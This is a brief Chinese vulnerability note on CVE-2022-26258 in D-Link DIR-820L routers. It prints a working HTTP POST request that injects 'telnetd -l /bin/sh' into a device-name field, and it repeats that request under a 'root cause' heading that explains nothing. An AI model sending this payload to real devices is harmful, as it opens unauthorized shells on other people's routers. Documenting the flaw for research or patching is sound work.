D-Link DIR-820L 远程命令执行漏洞 (CVE-2022-26258) 是一个严重的安全漏洞,影响 D-Link DIR-820L 路由器的固件版本 1.05B03。攻击者可以通过向 /get_set.ccp 发送恶意 HTTP POST 请求,利用该漏洞进行远程命令执行 (RCE)。
漏洞影响范围:
设备层 → 网络层 → 系统层
可远程执行命令,危及设备的安全性。
攻击者通过发送包含恶意命令的 HTTP POST 请求来触发远程命令执行漏洞: 通过 ccp_act=set 请求参数,攻击者可以向设备注入 telnetd 命令,允许远程连接到设备并执行任意命令。
请求示例:
POST /get_set.ccp HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.1/lan.asp
Cookie: hasLogin=1
ccp_act=set&old_ip=192.168.0.1&old_mask=255.255.255.0&new_ip=192.168.0.1&new_mask=255.255.255.0&lanHostCfg_DeviceName_1.1.1.0=%0atelnetd -l /bin/sh%0a
攻击者通过此请求将 telnetd -l /bin/sh 命令注入到 DeviceName 参数中,这将触发远程命令执行。
根本原因:
POST /get_set.ccp HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.1/lan.asp
Cookie: hasLogin=1
ccp_act=set&old_ip=192.168.0.1&old_mask=255.255.255.0&new_ip=192.168.0.1&new_mask=255.255.255.0&lanHostCfg_DeviceName_1.1.1.0=%0atelnetd -l /bin/sh%0a
通过上述请求,攻击者可以在目标设备上启动一个 telnet 服务,允许未授权访问。
效果:攻击者在路由器设备上远程命令执行
📝 作者:tzh00203 📧 邮箱:tian-zh24@mails.tsinghua.edu.cn 🏫 单位:Tsinghua Uni. NISL 📅 最后更新时间:2025-07-25